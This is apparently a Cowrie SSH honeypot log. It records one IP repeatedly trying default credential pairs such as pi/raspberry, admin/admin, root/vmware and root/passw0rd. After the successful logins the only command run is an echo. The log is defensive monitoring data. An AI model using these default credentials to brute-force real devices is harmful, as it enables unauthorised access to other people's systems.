{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:25:46.713961Z","src_ip":"212.227.235.229","session":"2378e30cf1de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:25:46.714893Z","src_ip":"212.227.235.229","session":"2378e30cf1de"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-26T08:25:48.196266Z","src_ip":"212.227.235.229","session":"2378e30cf1de"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:25:50.106341Z","src_ip":"212.227.235.229","session":"2378e30cf1de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35490,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a1d83124edd","protocol":"ssh","message":"New connection: 212.227.235.229:35490 (1.2.3.4:22) [session: 2a1d83124edd]","sensor":"my-vps","timestamp":"2025-08-26T08:25:50.220027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:25:50.792282Z","src_ip":"212.227.235.229","session":"2a1d83124edd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:25:50.793287Z","src_ip":"212.227.235.229","session":"2a1d83124edd"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T08:25:53.536243Z","src_ip":"212.227.235.229","session":"2a1d83124edd"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:25:55.114236Z","src_ip":"212.227.235.229","session":"2a1d83124edd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54604,"dst_ip":"1.2.3.4","dst_port":22,"session":"f48db24251e4","protocol":"ssh","message":"New connection: 212.227.235.229:54604 (1.2.3.4:22) [session: f48db24251e4]","sensor":"my-vps","timestamp":"2025-08-26T08:25:55.225049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:25:55.644569Z","src_ip":"212.227.235.229","session":"f48db24251e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:25:55.645243Z","src_ip":"212.227.235.229","session":"f48db24251e4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T08:25:58.705354Z","src_ip":"212.227.235.229","session":"f48db24251e4"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:00.310173Z","src_ip":"212.227.235.229","session":"f48db24251e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47926,"dst_ip":"1.2.3.4","dst_port":22,"session":"00ae219f38a6","protocol":"ssh","message":"New connection: 212.227.235.229:47926 (1.2.3.4:22) [session: 00ae219f38a6]","sensor":"my-vps","timestamp":"2025-08-26T08:26:00.427953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:01.300841Z","src_ip":"212.227.235.229","session":"00ae219f38a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:01.301713Z","src_ip":"212.227.235.229","session":"00ae219f38a6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:03.311298Z","src_ip":"212.227.235.229","session":"00ae219f38a6"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:04.787429Z","src_ip":"212.227.235.229","session":"00ae219f38a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38132,"dst_ip":"1.2.3.4","dst_port":22,"session":"9525be1ab581","protocol":"ssh","message":"New connection: 212.227.235.229:38132 (1.2.3.4:22) [session: 9525be1ab581]","sensor":"my-vps","timestamp":"2025-08-26T08:26:04.884837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:05.660276Z","src_ip":"212.227.235.229","session":"9525be1ab581"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:05.661342Z","src_ip":"212.227.235.229","session":"9525be1ab581"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:07.539039Z","src_ip":"212.227.235.229","session":"9525be1ab581"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:09.136999Z","src_ip":"212.227.235.229","session":"9525be1ab581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55700,"dst_ip":"1.2.3.4","dst_port":22,"session":"90350e2a9e30","protocol":"ssh","message":"New connection: 212.227.235.229:55700 (1.2.3.4:22) [session: 90350e2a9e30]","sensor":"my-vps","timestamp":"2025-08-26T08:26:09.234974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:09.748673Z","src_ip":"212.227.235.229","session":"90350e2a9e30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:09.749336Z","src_ip":"212.227.235.229","session":"90350e2a9e30"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:12.257555Z","src_ip":"212.227.235.229","session":"90350e2a9e30"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:13.436800Z","src_ip":"212.227.235.229","session":"90350e2a9e30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43858,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ab1e43a8be6","protocol":"ssh","message":"New connection: 212.227.235.229:43858 (1.2.3.4:22) [session: 9ab1e43a8be6]","sensor":"my-vps","timestamp":"2025-08-26T08:26:13.554764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:13.672594Z","src_ip":"212.227.235.229","session":"9ab1e43a8be6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:13.696285Z","src_ip":"212.227.235.229","session":"9ab1e43a8be6"}
{"eventid":"cowrie.login.success","username":"root","password":"vmware","message":"login attempt [root/vmware] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:26:16.824151Z","src_ip":"212.227.235.229","session":"9ab1e43a8be6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:26:19.209626Z","src_ip":"212.227.235.229","session":"9ab1e43a8be6"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:26:19.210329Z","src_ip":"212.227.235.229","session":"9ab1e43a8be6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:19.852996Z","src_ip":"212.227.235.229","session":"9ab1e43a8be6"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:19.854107Z","src_ip":"212.227.235.229","session":"9ab1e43a8be6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42092,"dst_ip":"1.2.3.4","dst_port":22,"session":"e893c77fc6e8","protocol":"ssh","message":"New connection: 212.227.235.229:42092 (1.2.3.4:22) [session: e893c77fc6e8]","sensor":"my-vps","timestamp":"2025-08-26T08:26:20.075181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:20.104666Z","src_ip":"212.227.235.229","session":"e893c77fc6e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:20.205385Z","src_ip":"212.227.235.229","session":"e893c77fc6e8"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:26:21.096375Z","src_ip":"212.227.235.229","session":"e893c77fc6e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:26:21.909133Z","src_ip":"212.227.235.229","session":"e893c77fc6e8"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:26:21.909854Z","src_ip":"212.227.235.229","session":"e893c77fc6e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:22.359184Z","src_ip":"212.227.235.229","session":"e893c77fc6e8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:22.360363Z","src_ip":"212.227.235.229","session":"e893c77fc6e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53630,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc18135b4f2d","protocol":"ssh","message":"New connection: 212.227.235.229:53630 (1.2.3.4:22) [session: cc18135b4f2d]","sensor":"my-vps","timestamp":"2025-08-26T08:26:22.506276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:22.959615Z","src_ip":"212.227.235.229","session":"cc18135b4f2d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:22.960698Z","src_ip":"212.227.235.229","session":"cc18135b4f2d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"passw0rd","message":"login attempt [admin/passw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:25.254182Z","src_ip":"212.227.235.229","session":"cc18135b4f2d"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:26.860906Z","src_ip":"212.227.235.229","session":"cc18135b4f2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44382,"dst_ip":"1.2.3.4","dst_port":22,"session":"feb013e7a1ae","protocol":"ssh","message":"New connection: 212.227.235.229:44382 (1.2.3.4:22) [session: feb013e7a1ae]","sensor":"my-vps","timestamp":"2025-08-26T08:26:26.967478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:27.485823Z","src_ip":"212.227.235.229","session":"feb013e7a1ae"}
